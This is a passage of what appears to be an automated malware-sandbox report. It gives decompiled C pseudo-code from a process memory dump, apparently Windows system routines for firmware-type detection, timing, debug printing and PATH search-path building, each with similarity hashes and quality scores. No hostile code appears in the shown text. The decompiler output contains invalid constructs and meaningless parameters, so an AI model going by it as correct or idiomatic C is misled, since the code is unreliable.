                    					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                    					_t113 = L01484620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                    					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                    					if(_t113 != 0) {
                    						_push(_t118 - 0x70);
                    						_push( *((intOrPtr*)(_t118 - 0x70)));
                    						_push(_t113);
                    						_push(4);
                    						_push(_t118 - 0x78);
                    						_push(0x6b);
                    						_t84 = E014AAA90();
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                    						if(_t84 < 0) {
                    							goto L29;
                    						}
                    						_t110 = 0;
                    						_t106 = 0;
                    						while(1) {
                    							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                    							 *(_t118 - 0x88) = _t106;
                    							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                    								break;
                    							}
                    							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                    							_t106 = _t106 + 1;
                    						}
                    						_t88 = E014E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                    						_t119 = _t119 + 0x1c;
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                    						if(_t88 < 0) {
                    							goto L29;
                    						}
                    						_t101 = _t118 - 0x3c;
                    						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                    						goto L21;
                    					}
                    					_t67 = 0xc0000017;
                    					goto L28;
                    				}
                    				_push(0);
                    				_push(0x20);
                    				_push(_t118 - 0x60);
                    				_push(0x5a);
                    				_t94 = E014A9860();
                    				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                    				if(_t94 < 0) {
                    					goto L29;
                    				}
                    				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                    					_t101 = L"Legacy";
                    					_push(6);
                    				} else {
                    					_t101 = L"UEFI";
                    					_push(4);
                    				}
                    				_pop(_t65);
                    				goto L21;
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 5a274e976c52455230d5b445c5f19bdf8f49956f529c24d06947fc7f21d4056a
                    • Instruction ID: ab391ab91809cf248df566fc1960c5e0fdbbee9b43d250e89001dc4d91ead01f
                    • Opcode Fuzzy Hash: 5a274e976c52455230d5b445c5f19bdf8f49956f529c24d06947fc7f21d4056a
                    • Instruction Fuzzy Hash: D5517E75E006099FDB24DFA9C984AAEBBF8FF58709F14442EE649EB261D7709901CB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0148B944(signed int* __ecx, char __edx) {
                    				signed int _v8;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int* _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				intOrPtr _v76;
                    				char _v77;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t65;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				char* _t73;
                    				intOrPtr _t77;
                    				intOrPtr _t78;
                    				signed int _t82;
                    				intOrPtr _t83;
                    				void* _t87;
                    				char _t88;
                    				intOrPtr* _t89;
                    				intOrPtr _t91;
                    				void* _t97;
                    				intOrPtr _t100;
                    				void* _t102;
                    				void* _t107;
                    				signed int _t108;
                    				intOrPtr* _t112;
                    				void* _t113;
                    				intOrPtr* _t114;
                    				intOrPtr _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t117;
                    				signed int _t118;
                    				void* _t130;
                    
                    				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                    				_v8 =  *0x155d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                    				_t112 = __ecx;
                    				_v77 = __edx;
                    				_v48 = __ecx;
                    				_v28 = 0;
                    				_t5 = _t112 + 0xc; // 0x575651ff
                    				_t105 =  *_t5;
                    				_v20 = 0;
                    				_v16 = 0;
                    				if(_t105 == 0) {
                    					_t50 = _t112 + 4; // 0x5de58b5b
                    					_t60 =  *__ecx |  *_t50;
                    					if(( *__ecx |  *_t50) != 0) {
                    						 *__ecx = 0;
                    						__ecx[1] = 0;
                    						if(E01487D50() != 0) {
                    							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    						} else {
                    							_t65 = 0x7ffe0386;
                    						}
                    						if( *_t65 != 0) {
                    							E01538CD6(_t112);
                    						}
                    						_push(0);
                    						_t52 = _t112 + 0x10; // 0x778df98b
                    						_push( *_t52);
                    						_t60 = E014A9E20();
                    					}
                    					L20:
                    					_pop(_t107);
                    					_pop(_t113);
                    					_pop(_t87);
                    					return E014AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                    				}
                    				_t8 = _t112 + 8; // 0x8b000cc2
                    				_t67 =  *_t8;
                    				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                    				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                    				_t108 =  *(_t67 + 0x14);
                    				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                    				_t105 = 0x2710;
                    				asm("sbb eax, edi");
                    				_v44 = _t88;
                    				_v52 = _t108;
                    				_t60 = E014ACE00(_t97, _t68, 0x2710, 0);
                    				_v56 = _t60;
                    				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                    					L3:
                    					 *(_t112 + 0x44) = _t60;
                    					_t105 = _t60 * 0x2710 >> 0x20;
                    					 *_t112 = _t88;
                    					 *(_t112 + 4) = _t108;
                    					_v20 = _t60 * 0x2710;
                    					_v16 = _t60 * 0x2710 >> 0x20;
                    					if(_v77 != 0) {
                    						L16:
                    						_v36 = _t88;
                    						_v32 = _t108;
                    						if(E01487D50() != 0) {
                    							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    						} else {
                    							_t73 = 0x7ffe0386;
                    						}
                    						if( *_t73 != 0) {
                    							_t105 = _v40;
                    							E01538F6A(_t112, _v40, _t88, _t108);
                    						}
                    						_push( &_v28);
                    						_push(0);
                    						_push( &_v36);
                    						_t48 = _t112 + 0x10; // 0x778df98b
                    						_push( *_t48);
                    						_t60 = E014AAF60();
                    						goto L20;
                    					} else {
                    						_t89 = 0x7ffe03b0;
                    						do {
                    							_t114 = 0x7ffe0010;
                    							do {
                    								_t77 =  *0x1558628; // 0x0
                    								_v68 = _t77;
                    								_t78 =  *0x155862c; // 0x0
                    								_v64 = _t78;
                    								_v72 =  *_t89;
                    								_v76 =  *((intOrPtr*)(_t89 + 4));
                    								while(1) {
                    									_t105 =  *0x7ffe000c;
                    									_t100 =  *0x7ffe0008;
                    									if(_t105 ==  *_t114) {
                    										goto L8;
                    									}
                    									asm("pause");
                    								}
                    								L8:
                    								_t89 = 0x7ffe03b0;
                    								_t115 =  *0x7ffe03b0;
                    								_t82 =  *0x7FFE03B4;
                    								_v60 = _t115;
                    								_t114 = 0x7ffe0010;
                    								_v56 = _t82;
                    							} while (_v72 != _t115 || _v76 != _t82);
                    							_t83 =  *0x1558628; // 0x0
                    							_t116 =  *0x155862c; // 0x0
                    							_v76 = _t116;
                    							_t117 = _v68;
                    						} while (_t117 != _t83 || _v64 != _v76);
                    						asm("sbb edx, [esp+0x24]");
                    						_t102 = _t100 - _v60 - _t117;
                    						_t112 = _v48;
                    						_t91 = _v44;
                    						asm("sbb edx, eax");
                    						_t130 = _t105 - _v52;
                    						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                    							_t88 = _t102 - _t91;
                    							asm("sbb edx, edi");
                    							_t108 = _t105;
                    						} else {
                    							_t88 = 0;
                    							_t108 = 0;
                    						}
                    						goto L16;
                    					}
                    				} else {
                    					if( *(_t112 + 0x44) == _t60) {
                    						goto L20;
                    					}
                    					goto L3;
                    				}
                    			}

















































                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0148B9A5
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: 66ddc2aa574b1706397b800eee3a0a16091ebd023f6d5a95c36a9bfbc63c69fe
                    • Instruction ID: a7239c53fd950778c6cdc5a3bec18bf7671ba9eaa36315a0143faa4cf0fb10a0
                    • Opcode Fuzzy Hash: 66ddc2aa574b1706397b800eee3a0a16091ebd023f6d5a95c36a9bfbc63c69fe
                    • Instruction Fuzzy Hash: E7517771A08301CFC721EF69C09092FFBE5FB98610F15496EEA9587365D770E844CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0146B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                    				signed int _t65;
                    				signed short _t69;
                    				intOrPtr _t70;
                    				signed short _t85;
                    				void* _t86;
                    				signed short _t89;
                    				signed short _t91;
                    				intOrPtr _t92;
                    				intOrPtr _t97;
                    				intOrPtr* _t98;
                    				signed short _t99;
                    				signed short _t101;
                    				void* _t102;
                    				char* _t103;
                    				signed short _t104;
                    				intOrPtr* _t110;
                    				void* _t111;
                    				void* _t114;
                    				intOrPtr* _t115;
                    
                    				_t109 = __esi;
                    				_t108 = __edi;
                    				_t106 = __edx;
                    				_t95 = __ebx;
                    				_push(0x90);
                    				_push(0x153f7a8);
                    				E014BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                    				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                    				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                    				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                    				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                    				if(__edx == 0xffffffff) {
                    					L6:
                    					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                    					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) != 0) {
                    						L3:
                    						L4:
                    						return E014BD130(_t95, _t108, _t109);
                    					}
                    					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                    					_t108 = 0;
                    					_t109 = 0;
                    					_t95 = 0;
                    					__eflags = 0;
                    					while(1) {
                    						__eflags = _t95 - 0x200;
                    						if(_t95 >= 0x200) {
                    							break;
                    						}
                    						E014AD000(0x80);
                    						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                    						_t108 = _t115;
                    						_t95 = _t95 - 0xffffff80;
                    						_t17 = _t114 - 4;
                    						 *_t17 =  *(_t114 - 4) & 0x00000000;
                    						__eflags =  *_t17;
                    						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                    						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                    						_t102 = _t110 + 1;
                    						do {
                    							_t85 =  *_t110;
                    							_t110 = _t110 + 1;
                    							__eflags = _t85;
                    						} while (_t85 != 0);
                    						_t111 = _t110 - _t102;
                    						_t21 = _t95 - 1; // -129
                    						_t86 = _t21;
                    						__eflags = _t111 - _t86;
                    						if(_t111 > _t86) {
                    							_t111 = _t86;
                    						}
                    						E014AF3E0(_t108, _t106, _t111);
                    						_t115 = _t115 + 0xc;
                    						_t103 = _t111 + _t108;
                    						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                    						_t89 = _t95 - _t111;
                    						__eflags = _t89;
                    						_push(0);
                    						if(_t89 == 0) {
                    							L15:
                    							_t109 = 0xc000000d;
                    							goto L16;
                    						} else {
                    							__eflags = _t89 - 0x7fffffff;
                    							if(_t89 <= 0x7fffffff) {
                    								L16:
                    								 *(_t114 - 0x94) = _t109;
                    								__eflags = _t109;
                    								if(_t109 < 0) {
                    									__eflags = _t89;
                    									if(_t89 != 0) {
                    										 *_t103 = 0;
                    									}
                    									L26:
                    									 *(_t114 - 0xa0) = _t109;
                    									 *(_t114 - 4) = 0xfffffffe;
                    									__eflags = _t109;
                    									if(_t109 >= 0) {
                    										L31:
                    										_t98 = _t108;
                    										_t39 = _t98 + 1; // 0x1
                    										_t106 = _t39;
                    										do {
                    											_t69 =  *_t98;
                    											_t98 = _t98 + 1;
                    											__eflags = _t69;
                    										} while (_t69 != 0);
                    										_t99 = _t98 - _t106;
                    										__eflags = _t99;
                    										L34:
                    										_t70 =  *[fs:0x30];
                    										__eflags =  *((char*)(_t70 + 2));
                    										if( *((char*)(_t70 + 2)) != 0) {
                    											L40:
                    											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                    											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                    											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                    											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                    											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                    											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                    											 *(_t114 - 4) = 1;
                    											_push(_t114 - 0x74);
                    											L014BDEF0(_t99, _t106);
                    											 *(_t114 - 4) = 0xfffffffe;
                    											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                    											goto L3;
                    										}
                    										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                    										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                    											goto L40;
                    										}
                    										_push( *((intOrPtr*)(_t114 + 8)));
                    										_push( *((intOrPtr*)(_t114 - 0x9c)));
                    										_push(_t99 & 0x0000ffff);
                    										_push(_t108);
                    										_push(1);
                    										_t101 = E014AB280();
                    										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                    										if( *((char*)(_t114 + 0x14)) == 1) {
                    											__eflags = _t101 - 0x80000003;
                    											if(_t101 == 0x80000003) {
                    												E014AB7E0(1);
                    												_t101 = 0;
                    												__eflags = 0;
                    											}
                    										}
                    										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                    										goto L4;
                    									}
                    									__eflags = _t109 - 0x80000005;
                    									if(_t109 == 0x80000005) {
                    										continue;
                    									}
                    									break;
                    								}
                    								 *(_t114 - 0x90) = 0;
                    								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                    								_t91 = E014AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                    								_t115 = _t115 + 0x10;
                    								_t104 = _t91;
                    								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                    								__eflags = _t104;
                    								if(_t104 < 0) {
                    									L21:
                    									_t109 = 0x80000005;
                    									 *(_t114 - 0x90) = 0x80000005;
                    									L22:
                    									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                    									L23:
                    									 *(_t114 - 0x94) = _t109;
                    									goto L26;
                    								}
                    								__eflags = _t104 - _t92;
                    								if(__eflags > 0) {
                    									goto L21;
                    								}
                    								if(__eflags == 0) {
                    									goto L22;
                    								}
                    								goto L23;
                    							}
                    							goto L15;
                    						}
                    					}
                    					__eflags = _t109;
                    					if(_t109 >= 0) {
                    						goto L31;
                    					}
                    					__eflags = _t109 - 0x80000005;
                    					if(_t109 != 0x80000005) {
                    						goto L31;
                    					}
                    					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                    					_t38 = _t95 - 1; // -129
                    					_t99 = _t38;
                    					goto L34;
                    				}
                    				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                    					__eflags = __edx - 0x65;
                    					if(__edx != 0x65) {
                    						goto L2;
                    					}
                    					goto L6;
                    				}
                    				L2:
                    				_push( *((intOrPtr*)(_t114 + 8)));
                    				_push(_t106);
                    				if(E014AA890() != 0) {
                    					goto L6;
                    				}
                    				goto L3;
                    			}























                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 23cb616648b7574bbd8e4d49a3ea1bf62c60015e8fed89564def254e2cef2f0d
                    • Instruction ID: 27426483c706d9592c9d2fcad3975ea70fb1fe0af72265a4af3556918b4fd4f1
                    • Opcode Fuzzy Hash: 23cb616648b7574bbd8e4d49a3ea1bf62c60015e8fed89564def254e2cef2f0d
                    • Instruction Fuzzy Hash: CF51E479D002698AEB71CF7889547EFBBB0AF10B14F1441AFD859973A1D7704941CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E01492581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200389, char _a1546912069) {
                    				void* _v5;
                    				signed int _v8;
                    				signed int _v16;
                    				unsigned int _v24;
                    				void* _v28;
                    				signed int _v32;
                    				unsigned int _v36;
                    				signed int _v37;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				intOrPtr _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _t243;
                    				signed int _t247;
                    				char* _t248;
                    				signed int _t252;
                    				signed int _t254;
                    				intOrPtr _t256;
                    				signed int _t259;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t277;
                    				intOrPtr _t283;
                    				signed int _t285;
                    				signed int _t287;
                    				void* _t288;
                    				void* _t289;
                    				signed int _t290;
                    				unsigned int _t293;
                    				signed int _t297;
                    				void* _t298;
                    				void* _t303;
                    				void* _t304;
                    				signed int _t306;
                    				signed int _t310;
                    				intOrPtr _t322;
                    				signed int _t331;
                    				signed int _t333;
                    				signed int _t334;
                    				signed int _t338;
                    				signed int _t339;
                    				intOrPtr* _t341;
                    				signed int _t343;
                    				signed int _t345;
                    				signed int _t352;
                    				void* _t353;
                    				void* _t355;
                    
                    				_t345 = _t352;
                    				_t353 = _t352 - 0x4c;
                    				_v8 =  *0x155d360 ^ _t345;
                    				_push(__ebx);
                    				_push(__esi);
                    				_push(__edi);
                    				_t338 = 0x155b2e8;
                    				_v56 = _a4;
                    				_v48 = __edx;
                    				_v60 = __ecx;
                    				_t293 = 0;
                    				_v80 = 0;
                    				asm("movsd");
                    				_v64 = 0;
                    				_v76 = 0;
                    				_v72 = 0;
                    				asm("movsd");
                    				_v44 = 0;
                    				_v52 = 0;
                    				_v68 = 0;
                    				asm("movsd");
                    				_v32 = 0;
                    				_v36 = 0;
                    				asm("movsd");
                    				_v16 = 0;
                    				_t283 = 0x48;
                    				_t320 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                    				_t331 = 0;
                    				_v37 = _t320;
                    				if(_v48 <= 0) {
                    					L16:
                    					_t45 = _t283 - 0x48; // 0x0
                    					__eflags = _t45 - 0xfffe;
                    					if(_t45 > 0xfffe) {
                    						_t339 = 0xc0000106;
                    						goto L32;
                    					} else {
                    						_t338 = L01484620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
                    						_v52 = _t338;
                    						__eflags = _t338;
                    						if(_t338 == 0) {
                    							_t339 = 0xc0000017;
                    							goto L32;
                    						} else {
                    							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
                    							_t50 = _t338 + 0x48; // 0x48
                    							_t333 = _t50;
                    							_t320 = _v32;
                    							 *((intOrPtr*)(_t338 + 0x3c)) = _t283;
                    							_t285 = 0;
                    							 *((short*)(_t338 + 0x30)) = _v48;
                    							__eflags = _t320;
                    							if(_t320 != 0) {
                    								 *(_t338 + 0x18) = _t333;
                    								__eflags = _t320 - 0x1558478;
                    								 *_t338 = ((0 | _t320 == 0x01558478) - 0x00000001 & 0xfffffffb) + 7;
                    								E014AF3E0(_t333,  *((intOrPtr*)(_t320 + 4)),  *_t320 & 0x0000ffff);
                    								_t320 = _v32;
                    								_t353 = _t353 + 0xc;
                    								_t285 = 1;
                    								__eflags = _a8;
                    								_t333 = _t333 + (( *_t320 & 0x0000ffff) >> 1) * 2;
                    								if(_a8 != 0) {
                    									_t277 = E014F39F2(_t333);
                    									_t320 = _v32;
                    									_t333 = _t277;
                    								}
                    							}
                    							_t297 = 0;
                    							_v16 = 0;
                    							__eflags = _v48;
                    							if(_v48 <= 0) {
                    								L31:
                    								_t339 = _v68;
                    								__eflags = 0;
                    								 *((short*)(_t333 - 2)) = 0;
                    								goto L32;
                    							} else {
                    								_t287 = _t338 + _t285 * 4;
                    								_v56 = _t287;
                    								do {
                    									__eflags = _t320;
                    									if(_t320 != 0) {
                    										_t243 =  *(_v60 + _t297 * 4);
                    										__eflags = _t243;
                    										if(_t243 == 0) {
                    											goto L30;
                    										} else {
                    											__eflags = _t243 == 5;
                    											if(_t243 == 5) {
                    												goto L30;
                    											} else {
                    												goto L22;
                    											}
                    										}
                    									} else {
                    										L22:
                    										 *_t287 =  *(_v60 + _t297 * 4);
                    										 *(_t287 + 0x18) = _t333;
                    										_t247 =  *(_v60 + _t297 * 4);
                    										__eflags = _t247 - 8;
                    										if(_t247 > 8) {
                    											goto L56;
                    										} else {
                    											switch( *((intOrPtr*)(_t247 * 4 +  &M01492959))) {
                    												case 0:
                    													__ax =  *0x1558488;
                    													__eflags = __ax;
                    													if(__ax == 0) {
                    														goto L29;
                    													} else {
                    														__ax & 0x0000ffff = E014AF3E0(__edi,  *0x155848c, __ax & 0x0000ffff);
                    														__eax =  *0x1558488 & 0x0000ffff;
                    														goto L26;
                    													}
                    													goto L108;
                    												case 1:
                    													L45:
                    													E014AF3E0(_t333, _v80, _v64);
                    													_t272 = _v64;
                    													goto L26;
                    												case 2:
                    													 *0x1558480 & 0x0000ffff = E014AF3E0(__edi,  *0x1558484,  *0x1558480 & 0x0000ffff);
                    													__eax =  *0x1558480 & 0x0000ffff;
                    													__eax = ( *0x1558480 & 0x0000ffff) >> 1;
                    													__edi = __edi + __eax * 2;
                    													goto L28;
                    												case 3:
                    													__eax = _v44;
                    													__eflags = __eax;
                    													if(__eax == 0) {
                    														goto L29;
                    													} else {
                    														__esi = __eax + __eax;
                    														__eax = E014AF3E0(__edi, _v72, __esi);
                    														__edi = __edi + __esi;
                    														__esi = _v52;
                    														goto L27;
                    													}
                    													goto L108;
                    												case 4:
                    													_push(0x2e);
                    													_pop(__eax);
                    													 *(__esi + 0x44) = __edi;
                    													 *__edi = __ax;
                    													__edi = __edi + 4;
                    													_push(0x3b);
                    													_pop(__eax);
                    													 *(__edi - 2) = __ax;
                    													goto L29;
                    												case 5:
                    													__eflags = _v36;
                    													if(_v36 == 0) {
                    														goto L45;
                    													} else {
                    														E014AF3E0(_t333, _v76, _v36);
                    														_t272 = _v36;
                    													}
                    													L26:
                    													_t353 = _t353 + 0xc;
                    													_t333 = _t333 + (_t272 >> 1) * 2 + 2;
                    													__eflags = _t333;
                    													L27:
                    													_push(0x3b);
                    													_pop(_t274);
                    													 *((short*)(_t333 - 2)) = _t274;
                    													goto L28;
                    												case 6:
                    													__ebx =  *0x155575c;
                    													__eflags = __ebx - 0x155575c;
                    													if(__ebx != 0x155575c) {
                    														_push(0x3b);
                    														_pop(__esi);
                    														do {
                    															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                    															E014AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                    															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                    															__edi = __edi + __eax * 2;
                    															__edi = __edi + 2;
                    															 *(__edi - 2) = __si;
                    															__ebx =  *__ebx;
                    															__eflags = __ebx - 0x155575c;
                    														} while (__ebx != 0x155575c);
                    														__esi = _v52;
                    														__ecx = _v16;
                    														__edx = _v32;
                    													}
                    													__ebx = _v56;
                    													goto L29;
                    												case 7:
                    													 *0x1558478 & 0x0000ffff = E014AF3E0(__edi,  *0x155847c,  *0x1558478 & 0x0000ffff);
                    													__eax =  *0x1558478 & 0x0000ffff;
                    													__eax = ( *0x1558478 & 0x0000ffff) >> 1;
                    													__eflags = _a8;
                    													__edi = __edi + __eax * 2;
                    													if(_a8 != 0) {
                    														__ecx = __edi;
                    														__eax = E014F39F2(__ecx);
                    														__edi = __eax;
                    													}
                    													goto L28;
                    												case 8:
                    													__eax = 0;
                    													 *(__edi - 2) = __ax;
                    													 *0x1556e58 & 0x0000ffff = E014AF3E0(__edi,  *0x1556e5c,  *0x1556e58 & 0x0000ffff);
                    													 *(__esi + 0x38) = __edi;
                    													__eax =  *0x1556e58 & 0x0000ffff;
                    													__eax = ( *0x1556e58 & 0x0000ffff) >> 1;
                    													__edi = __edi + __eax * 2;
                    													__edi = __edi + 2;
                    													L28:
                    													_t297 = _v16;
                    													_t320 = _v32;
                    													L29:
                    													_t287 = _t287 + 4;
                    													__eflags = _t287;
                    													_v56 = _t287;
                    													goto L30;
                    											}
                    										}
                    									}
                    									goto L108;
                    									L30:
                    									_t297 = _t297 + 1;
                    									_v16 = _t297;
                    									__eflags = _t297 - _v48;
                    								} while (_t297 < _v48);
                    								goto L31;
                    							}
                    						}
                    					}
                    				} else {
                    					while(1) {
                    						L1:
                    						_t247 =  *(_v60 + _t331 * 4);
                    						if(_t247 > 8) {
                    							break;
                    						}
                    						switch( *((intOrPtr*)(_t247 * 4 +  &M01492935))) {
                    							case 0:
                    								__ax =  *0x1558488;
                    								__eflags = __ax;
                    								if(__ax != 0) {
                    									__eax = __ax & 0x0000ffff;
                    									__ebx = __ebx + 2;
                    									__eflags = __ebx;
                    									goto L53;
                    								}
                    								goto L14;
                    							case 1:
                    								L44:
                    								_t320 =  &_v64;
                    								_v80 = E01492E3E(0,  &_v64);
                    								_t283 = _t283 + _v64 + 2;
                    								goto L13;
                    							case 2:
                    								__eax =  *0x1558480 & 0x0000ffff;
                    								__ebx = __ebx + __eax;
                    								__eflags = __dl;
                    								if(__dl != 0) {
                    									__eax = 0x1558480;
                    									goto L80;
                    								}
                    								goto L14;
                    							case 3:
                    								__eax = E0147EEF0(0x15579a0);
                    								__eax =  &_v44;
                    								_push(__eax);
                    								_push(0);
                    								_push(0);
                    								_push(4);
                    								_push(L"PATH");
                    								_push(0);
                    								L57();
                    								__esi = __eax;
                    								_v68 = __esi;
                    								__eflags = __esi - 0xc0000023;
                    								if(__esi != 0xc0000023) {
                    									L10:
                    									__eax = E0147EB70(__ecx, 0x15579a0);
                    									__eflags = __esi - 0xc0000100;
                    									if(__esi == 0xc0000100) {
                    										_v44 = _v44 & 0x00000000;
                    										__eax = 0;
                    										_v68 = 0;
                    										goto L13;
                    									} else {
                    										__eflags = __esi;
                    										if(__esi < 0) {
                    											L32:
                    											_t221 = _v72;
                    											__eflags = _t221;
                    											if(_t221 != 0) {
                    												L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                    											}
                    											_t222 = _v52;
                    											__eflags = _t222;
                    											if(_t222 != 0) {
                    												__eflags = _t339;
                    												if(_t339 < 0) {
                    													L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                    													_t222 = 0;
                    												}
                    											}
                    											goto L36;
                    										} else {
                    											__eax = _v44;
                    											__ebx = __ebx + __eax * 2;
                    											__ebx = __ebx + 2;
                    											__eflags = __ebx;
                    											L13:
                    											_t293 = _v36;
                    											goto L14;
                    										}
                    									}
                    								} else {
                    									__eax = _v44;
                    									__ecx =  *0x1557b9c; // 0x0
                    									_v44 + _v44 =  *[fs:0x30];
                    									__ecx = __ecx + 0x180000;
                    									__eax = L01484620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                    									_v72 = __eax;
                    									__eflags = __eax;
                    									if(__eax == 0) {
                    										__eax = E0147EB70(__ecx, 0x15579a0);
                    										__eax = _v52;
                    										L36:
                    										_pop(_t332);
                    										_pop(_t340);
                    										__eflags = _v8 ^ _t345;
                    										_pop(_t284);
                    										return E014AB640(_t222, _t284, _v8 ^ _t345, _t320, _t332, _t340);
                    									} else {
                    										__ecx =  &_v44;
                    										_push(__ecx);
                    										_push(_v44);
                    										_push(__eax);
                    										_push(4);
                    										_push(L"PATH");
                    										_push(0);
                    										L57();
                    										__esi = __eax;
                    										_v68 = __eax;
                    										goto L10;
                    									}
                    								}
                    								goto L108;
                    							case 4:
                    								__ebx = __ebx + 4;
                    								goto L14;
                    							case 5:
                    								_t279 = _v56;
                    								if(_v56 != 0) {
                    									_t320 =  &_v36;
                    									_t281 = E01492E3E(_t279,  &_v36);
                    									_t293 = _v36;
                    									_v76 = _t281;
                    								}
                    								if(_t293 == 0) {
                    									goto L44;
                    								} else {
                    									_t283 = _t283 + 2 + _t293;
                    								}
                    								goto L14;
                    							case 6:
                    								__eax =  *0x1555764 & 0x0000ffff;
                    								goto L53;
                    							case 7:
                    								__eax =  *0x1558478 & 0x0000ffff;
                    								__ebx = __ebx + __eax;
                    								__eflags = _a8;
                    								if(_a8 != 0) {
